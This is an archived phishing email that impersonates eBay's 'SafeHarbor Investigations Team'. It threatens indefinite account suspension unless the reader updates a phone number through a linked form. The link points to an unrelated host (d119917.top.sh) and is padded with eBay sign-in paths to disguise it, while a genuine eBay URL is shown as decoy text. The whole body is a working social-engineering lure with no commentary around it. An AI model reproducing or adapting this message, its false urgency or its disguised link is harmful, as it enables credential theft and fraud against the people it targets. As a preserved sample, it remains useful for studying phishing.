Mailing List Archive

TKO NOTICE: eBay Account Violation Notice
http://click3.ebay.com/99019653.50692.0.20283"]
Dear eBay Member,

We regret to inform you that your home phone number had an error on eBay Inc. databases.

We use your phone number for your identification purpose only.

If the requested information is not provided to us then we will regret to inform you that your account
will be suspended from our database until required information is provided

* Invalid User Information - Our records show that there are some discrepancies with the information
that you registered with on our service. Due to this violation your account will be suspended indefinitely
from the site until valid information can be provided.*

Due to the suspension of this account, please be advised you are prohibited from using eBay in any way.
This includes the registering of a new account.

Please note that this suspension does not relieve you of your agreed-upon obligation to pay any fees you
may owe to eBay.

To provide us with your phone number, visit the link below and complete the form:

http://d119917.top.sh/Update/SAPI.dll/account-information-update/verify/eb5.02/aw-cgi/ws2/SignIn.html?eBayISAPI.dll=username&value=0:US?https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&co_partnerId=2&pUserId=&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=http%3A%2F%2Fwww.ebay.com&pp=&pa2=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=&migrateVisitor="]http://signin.ebay.com/aw-cgi/eBayISAPI.dll?SignIn

Regards,
Ian
eBay SafeHarbor
Investigations Team
Copyright © 1995-2004 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property
of their respective owners.